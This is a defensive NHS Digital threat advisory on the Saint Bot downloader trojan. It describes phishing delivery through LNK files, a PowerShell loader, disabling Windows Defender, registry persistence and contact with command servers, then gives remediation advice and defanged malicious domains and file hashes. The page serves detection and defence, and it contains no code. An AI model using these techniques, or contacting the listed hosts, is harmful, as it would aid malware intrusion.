Skip to main content

Saint Bot Trojan

First seen in early 2021, Saint Bot is a new downloader trojan that has been steadily growing the number of affiliates using it. The majority of campaigns it has been involved in have delivered the Taurus infostealer, although a significant minority have dropped the Glupteba backdoor.

Threat ID:
CC-3823
Category:
Loader
Threat Severity:
Medium
Threat Vector:
Phishing
Published:
14 April 2021 3:12 PM
Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

First seen in early 2021, Saint Bot is a new downloader trojan that has been steadily growing the number of affiliates using it. The majority of campaigns it has been involved in have delivered the Taurus infostealer, although a significant minority have dropped the Glupteba backdoor.

Affected platforms

The following platforms are known to be affected:

Versions: all supported

Microsoft Windows

Threat details

Introduction

Saint Bot is a newly observed downloader trojan that has delivering the Taurus Stealer and Glupteba malware in Covid-related campaigns. Despite being relatively new, it uses a number of advanced techniques, suggesting it's creators are more sophisticated than expected.

Delivery

Saint Bot is delivered via phishing emails containing ZIP attachments, which themselves contain LNK files. When opened, the LNK file points to a download URL, where it pulls and executes a initial PowerShell loader in the %TEMP% folder. This loader then downloads and executes two EXE files, the first of which is a batch script that attempts to disable Windows Defender, whilst the other contains Saint Bot.

Activities

Once executed, Saint Bot will drop several scripts to control its other components, including a copy of ntdll which it uses in place of the legitimate version. It then performs an emulation check as well as a location check to determine which locale the affected systems is in, terminating itself if it appears to be in any members of the Commonwealth of Independent States. A Run registry key is created to ensure persistence.

Saint Bot will then attempt to contact one of several hardcoded command and control (C2) addresses, and will send system information to any server that responds. Download URLs for new payloads are then passed to it from the C2 server.

Remediation advice

To prevent and detect an infection, NHS Digital advises that:

  • Secure configurations are applied to all devices.
  • Security updates are applied at the earliest opportunity.
  • Tamper protection settings in security products are enabled where available.
  • Obsolete platforms are segregated from the rest of the network.
  • IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
  • Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
  • Administrative accounts are only used for necessary purposes.
  • Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
  • Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.

Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.

Indicators of compromise

Network indicators

Domains

  • 380222001[.]xyz
  • 68468438438[.]xyz
  • update-0019992[.]ru
Host indicators

SHA256 hashes

  • 2d88db4098a72cd9cb58a760e6a019f6e1587b7b03d4f074c979e776ce110403
  • 63d7b35ca907673634ea66e73d6a38486b0b043f3d511ec2d2209597c7898ae8
  • a4b705baac8bb2c0d2bc111eae9735fb8586d6d1dab050f3c89fb12589470969
  • a98e108588e31f40cdaeab1c04d0a394eb35a2e151f95fbf8a913cba6a7faa63
  • b0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274

Last edited: 6 September 2021 11:54 am